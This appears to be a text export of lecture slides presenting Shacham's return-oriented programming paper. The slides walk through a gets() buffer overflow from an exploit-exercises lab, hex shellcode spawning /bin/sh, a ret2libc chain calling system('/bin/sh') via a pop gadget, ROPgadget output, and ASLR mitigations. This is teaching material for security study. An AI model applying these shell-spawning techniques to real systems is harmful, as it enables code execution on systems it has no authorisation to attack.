The geometry of innocent flesh on the bone: Return-into-libc without function calls (on the x86) Hovav Shacham presented by: Fabian Fäßler
return-oriented programming Hovav Shacham presented by: Fabian Fäßler
ROP Hovav Shacham presented by: Fabian Fäßler
What to take away from this Programming languages exist where you don t expect them weird machine There is additional code in every binary, but nobody put it there intentionally A creative way to bypass a security mechanism 4
Overview Buffer Overflow + Shellcode DEP / W X return2libc return-oriented programming additional information 5
Buffer Overflow + Shellcode 0x080483c4 <main+0>: push 0x080483c5 <main+1>: mov 0x080483c7 <main+3>: and 0x080483ca <main+6>: sub 0x080483cd <main+9>: lea 0x080483d1 <main+13>: mov 0x080483d4 <main+16>: call 0x080483d9 <main+21>: leave 0x080483da <main+22>: ret ebp ebp,esp esp,0xfffffff0 esp,0x50 eax,[esp+0x10] DWORD PTR [esp],eax 0x80482e8 <gets@plt> 6 source: exploit-exercises.com
Buffer Overflow + Shellcode --> 0x080483c4 <main+0>: push 0x080483c5 <main+1>: mov 0x080483c7 <main+3>: and 0x080483ca <main+6>: sub 0x080483cd <main+9>: lea 0x080483d1 <main+13>: mov 0x080483d4 <main+16>: call 0x080483d9 <main+21>: leave 0x080483da <main+22>: ret ebp ebp,esp esp,0xfffffff0 esp,0x50 eax,[esp+0x10] DWORD PTR [esp],eax 0x80482e8 <gets@plt> eax 0xbffffc60 ecx 0xbbb5764b edx 0x00000001 ebx 0xb7fd7ff4 esp 0xbffffc50 ebp 0xbffffca8 esi 0x00000000 edi 0x00000000 eip 0x080483d4 <main+16> 0xbffffc60 0xb7ec6165 0xbffffc68 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 0x0804958c 7 source: exploit-exercises.com
Buffer Overflow + Shellcode 0x080483c4 <main+0>: push 0x080483c5 <main+1>: mov 0x080483c7 <main+3>: and 0x080483ca <main+6>: sub 0x080483cd <main+9>: lea 0x080483d1 <main+13>: mov 0x080483d4 <main+16>: call 0x080483d9 <main+21>: leave 0x080483da <main+22>: ret ebp ebp,esp esp,0xfffffff0 esp,0x50 eax,[esp+0x10] DWORD PTR [esp],eax 0x80482e8 <gets@plt> 0xb7ef3e40 <_IO_gets+0>: push ebp... 0xb7ef3f2c <_IO_gets+236>: pop ebp 0xb7ef3f2d <_IO_gets+237>: ret eax ecx edx ebx esp ebp esi edi eip 0xbffffc60 0xbbb5764b 0x00000001 0xb7fd7ff4 0xbffffc4c 0xbffffca8 0x00000000 0x00000000 0xb7ef3e40 <_IO_gets+0> 0x080483d9 0xbffffc60 0xb7ec6165 0xbffffc68 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 8 source: exploit-exercises.com
Buffer Overflow + Shellcode 0x080483c4 <main+0>: push 0x080483c5 <main+1>: mov 0x080483c7 <main+3>: and 0x080483ca <main+6>: sub 0x080483cd <main+9>: lea 0x080483d1 <main+13>: mov 0x080483d4 <main+16>: call 0x080483d9 <main+21>: leave 0x080483da <main+22>: ret ebp ebp,esp esp,0xfffffff0 esp,0x50 eax,[esp+0x10] DWORD PTR [esp],eax 0x80482e8 <gets@plt> 0xb7ef3e40 <_IO_gets+0>: push ebp... 0xb7ef3f2c <_IO_gets+236>: pop ebp 0xb7ef3f2d <_IO_gets+237>: ret eax ecx edx ebx esp ebp esi edi eip 0xbffffc60 0xbffffc60 0xb7fd9334 0xb7fd7ff4 0xbffffc4c 0xbffffca8 0x00000000 0x00000000 0xb7ef3f2d <_IO_gets+237> 0x080483d9 0xbffffc60 0xb7ec6165 0xbffffc68 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 9 source: exploit-exercises.com
Buffer Overflow + Shellcode 0x080483c4 <main+0>: push 0x080483c5 <main+1>: mov 0x080483c7 <main+3>: and 0x080483ca <main+6>: sub 0x080483cd <main+9>: lea 0x080483d1 <main+13>: mov 0x080483d4 <main+16>: call 0x080483d9 <main+21>: leave 0x080483da <main+22>: ret eax ecx edx ebx esp ebp esi edi eip ebp ebp,esp esp,0xfffffff0 esp,0x50 eax,[esp+0x10] DWORD PTR [esp],eax 0x80482e8 <gets@plt> 0xbffffc60 0xbffffc60 0xb7fd9334 0xb7fd7ff4 0xbffffc4c 0xbffffca8 0x00000000 0x00000000 0xb7ef3f2d <_IO_gets+237> 0xb7ef3e40 <_IO_gets+0>: push ebp... 0xb7ef3f2c <_IO_gets+236>: pop ebp 0xb7ef3f2d <_IO_gets+237>: ret? 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 10 source: exploit-exercises.com
Buffer Overflow + Shellcode 0x31c05068 0x2f2f7368 0x682f6269 0x6e89e350 0xbffffc30 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 11
Buffer Overflow + Shellcode Shellcode Restrictions: Attacker has to write it somewhere Write destination has to be executable 0x31c05068 0x2f2f7368 0x682f6269 0x6e89e350 0xbffffc30 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 12
DEP / W X Shellcode Restrictions: Attacker has to write it somewhere Write destination has to be executable! Countermeasures: Data Execution Prevention Write XOR Execute - memory protection policy 13
ret2libc? 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 14
ret2libc (gdb) x system 0xb7ecffb0 < libc_system>: 0x890cec83 (gdb) disassemble system Dump of assembler code for function libc_system: 0xb7ecffb0 < libc_system+0>: sub esp,0xc 0xb7ecffb3 < libc_system+3>: mov DWORD PTR [esp+0x4],esi 0xb7ecffb7 < libc_system+7>: mov esi,dword PTR [esp+0x10] system() without one line of injected code but what about parameters? We want to call system( /bin/sh ) Parameter passed with register eax 0xb7ecffb0 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 15
ret2libc (gdb) disassemble mcount Dump of assembler code for function mcount: 0xb7f65fb0 <mcount+0>: push eax 0xb7f65fb1 <mcount+1>: push ecx 0xb7f65fb2 <mcount+2>: push edx 0xb7f65fb3 <mcount+3>: mov edx,dword PTR [esp+0xc] 0xb7f65fb7 <mcount+7>: mov eax,dword PTR [ebp+0x4] 0xb7f65fba <mcount+10>: call 0xb7f654c0 < mcount_internal> 0xb7f65fbf <mcount+15>: pop edx 0xb7f65fc0 <mcount+16>: pop ecx 0xb7f65fc1 <mcount+17>: pop eax 0xb7f65fc2 <mcount+18>: ret system() without one line of injected code but what about parameters? We want to call system( /bin/sh ) Parameter passed with register eax 0xb7f65fc1 0xb7ecffb0 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 16
ret2libc (gdb) disassemble mcount Dump of assembler code for function mcount: 0xb7f65fb0 <mcount+0>: push eax 0xb7f65fb1 <mcount+1>: push ecx 0xb7f65fb2 <mcount+2>: push edx 0xb7f65fb3 <mcount+3>: mov edx,dword PTR [esp+0xc] 0xb7f65fb7 <mcount+7>: mov eax,dword PTR [ebp+0x4] 0xb7f65fba <mcount+10>: call 0xb7f654c0 < mcount_internal> 0xb7f65fbf <mcount+15>: pop edx 0xb7f65fc0 <mcount+16>: pop ecx 0xb7f65fc1 <mcount+17>: pop eax 0xb7f65fc2 <mcount+18>: ret system() without one line of injected code but what about parameters? We want to call system( /bin/sh ) Parameter passed with register eax 0xb7f65fbf 0xb7ecffb0 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 17
ret2libc (gdb) disassemble mcount Dump of assembler code for function mcount: 0xb7f65fb0 <mcount+0>: push eax 0xb7f65fb1 <mcount+1>: push ecx 0xb7f65fb2 <mcount+2>: push edx 0xb7f65fb3 <mcount+3>: mov edx,dword PTR [esp+0xc] 0xb7f65fb7 <mcount+7>: mov eax,dword PTR [ebp+0x4] 0xb7f65fba <mcount+10>: call 0xb7f654c0 < mcount_internal> 0xb7f65fbf <mcount+15>: pop edx 0xb7f65fc0 <mcount+16>: pop ecx 0xb7f65fc1 <mcount+17>: pop eax 0xb7f65fc2 <mcount+18>: ret system() without one line of injected code but what about parameters? We want to call system( /bin/sh ) Parameter passed with register eax 0xb7f65fbf 0xb7ecffb0 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 18
ret2libc (gdb) disassemble mcount Dump of assembler code for function mcount: 0xb7f65fb0 <mcount+0>: push eax 0xb7f65fb1 <mcount+1>: push ecx 0xb7f65fb2 <mcount+2>: push edx 0xb7f65fb3 <mcount+3>: mov edx,dword PTR [esp+0xc] 0xb7f65fb7 <mcount+7>: mov eax,dword PTR [ebp+0x4] 0xb7f65fba <mcount+10>: call 0xb7f654c0 < mcount_internal> 0xb7f65fbf <mcount+15>: pop edx 0xb7f65fc0 <mcount+16>: pop ecx 0xb7f65fc1 <mcount+17>: pop eax 0xb7f65fc2 <mcount+18>: ret! Gadget 0xb7f65fbf 0xb7ecffb0 0xb7eada75 0xb7fd7ff4 0x0804958c 0xbffffc78 0x080482c4 0xb7ff1040 19
ret2libc - recap Oldschool shellcode requires write AND execute rights ret2libc can be used to call critical functions such as system, execve, etc. You can load parameters and chain functions! 20
ret2libc - recap Oldschool shellcode requires write AND execute rights ret2libc can be used to call critical functions such as system, execve, etc. You can load parameters and chain functions! Evolution of ret2libc is ROP 21
ROP - step 1/2 1. Find gadgets asm 0xb7f65fbf <mcount+15>: 0xb7f65fc0 <mcount+16>: 0xb7f65fc1 <mcount+17>: 0xb7f65fc2 <mcount+18>: pop edx pop ecx pop eax ret 0x51 0x59 0x58 0xc3 22
ROP - step 1/2 1. Find gadgets asm 0xb7f65fbf <mcount+15>: 0xb7f65fc0 <mcount+16>: 0xb7f65fc1 <mcount+17>: 0xb7f65fc2 <mcount+18>: pop edx pop ecx pop eax ret 0x51 0x59 0x58 0xc3 0xb7f0bc0d <stpcpy+61>: 0xb7f0bc0e <stpcpy+62>: 0xb7f0bc0f <stpcpy+63>: 0xb7f0bc10 <stpcpy+64>: inc eax inc eax inc eax ret 0xb7f29fc7 <dirfd+7>: 0xb7f29fc9 <dirfd+9>: mov eax,dword PTR [eax] ret 23
ROP - step 1/2 1. Find gadgets - advanced 24
ROP - step 1/2 1. Find gadgets - advanced 25
ROP - step 1/2 1. Find gadgets - advanced 000428b2 : ror byte ptr [edi], -0x7c 000428b5 : ret 26
ROP - step 1/2 1. Find gadgets - advanced 000428b2 : ror byte ptr [edi], -0x7c 000428b5 : ret algorithm: search for 0xc3 (ret), and look backwards if there are valid instructions. 27
ROP - step 1/2 1. Find gadgets - advanced $ python ROPgadget.py --binary ~/libc.so.6 0x00138c14 : xor al, -0x20 ; add byte ptr [eax], al ; sbb ah, cl ; cli ; call edi 0x00128f04 : xor al, -0x58 ; add byte ptr [eax], al ; cld ; ret -0xa 0x0012ab71 : sub esi, edi ; jmp esp 0x00132835 : sub esi, esi ; call dword ptr [eax] 0x00028188 : sub esp, 0x10 ; call 0x16ad8 0x0003d595 : rol byte ptr [ecx], -0x7d ; ret 0x390c 0x0012879a : rep push eax ; jnp 0x1287a8 ; add byte ptr [esp + edi*8 + 0xfffffff3], bl ; call dword ptr [eax] 0x00072d09 : or dword ptr [ebx + 0x960ff07d], ecx ; ret 0x5589 0x000a4079 : movzx eax, al ; sub eax, 1 ; pop ebp ; ret 0x00097c4a : mov eax, 0x39 ; int 0x80 0x0011b958 : jo 0x11b901 ; hlt ; call ebx 0x0006557c : jge 0x6557f ; mov esp, ebp ; pop ebp ; ret 0x00022146 : add eax, dword ptr [eax] ; add byte ptr [ebx + 0xfffe548d], cl ; jmp dword ptr [ebx]... 28
geometry intel assembler is very dense and doesn t enforce alignment.! meaning that a random byte stream can be interpreted as a series of valid instructions with high probability [0] 29
geometry intel assembler is very dense and doesn t enforce alignment.! meaning that a random byte stream can be interpreted as a series of valid instructions with high probability [0] ARM has 32bit and 16bit wide instructions. Forcing THUMB mode could be used as well. 30
geometry intel assembler is very dense and doesn t enforce alignment.! meaning that a random byte stream can be interpreted as a series of valid instructions with high probability [0] ARM has 32bit and 16bit wide instructions. Forcing THUMB mode could be used as well.! MIPS enforces 32bit instructions and alignment.! 31
ROP - step 2/2 2. The weird machine - building an instruction set. 32
ROP - step 2/2 2. The weird machine - building an instruction set. 0xb7f65fbf <mcount+15>: 0xb7f65fc0 <mcount+16>: 0xb7f65fc1 <mcount+17>: 0xb7f65fc2 <mcount+18>: pop edx pop ecx pop eax ret load values into registers 0xb7f0bc0d <stpcpy+61>: 0xb7f0bc0e <stpcpy+62>: 0xb7f0bc0f <stpcpy+63>: 0xb7f0bc10 <stpcpy+64>: inc eax inc eax inc eax ret increment registers 0xb7f29fc7 <dirfd+7>: 0xb7f29fc9 <dirfd+9>: mov eax,dword PTR [eax] ret load from an address 33
ROP - step 2/2 2. The weird machine - building an instruction set. add: 34
ROP - step 2/2 2. The weird machine - building an instruction set. add: 35
ROP - step 2/2 2. The weird machine - building an instruction set. add: 36
ROP - step 2/2 2. The weird machine - building an instruction set. Loading Constant Loading from Memory Storing to Memory Add XOR And/Or/Not Shift and Rotate Unconditional Jumps Conditional Jumps System Calls Function Calls (ret2libc) 37 Write any code you like <3
a weird machine is born source: The science 38 of Insecurity (29c3) - Sassman, Patterson, Bratus
What to take away from this Programming languages exist where you don t expect them weird machine There is additional code in every binary, but nobody put it there intentionally A creative way to bypass a security mechanism 39
What to take away from this Programming languages exist where you don t expect them weird machine There is additional code in every binary, but nobody put it there intentionally A creative way to bypass a security mechanism 40
What to take away from this Programming languages exist where you don t expect them weird machine There is additional code in every binary, but nobody put it there intentionally A creative way to bypass a security mechanism 41
Discussion What is the obvious mitigation for this? 42
The ASLR Lie source: http://www.sophos.com/en-us/support/knowledgebase/118424.aspx
The ASLR Lie source: http://docs.oracle.com/cd/e36784_01/html/e37121/concept-aslr-1.html
The ASLR Lie source: http://kernelnewbies.org/linux_3.14
Discussion What do you think about, ROP, geometry, ASLR, W X 46
References The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86) - [0] direct quote page 4 - Figure 5 - Figure 7 exploit-exercises.com http://kernelnewbies.org/linux_3.14 http://docs.oracle.com/cd/e36784_01/html/e37121/concept-aslr-1.html http://www.sophos.com/en-us/support/knowledgebase/118424.aspx The science of Insecurity - Sassman, Patterson, Bratus http://langsec.org/insecurity-theory-28c3.pdf 47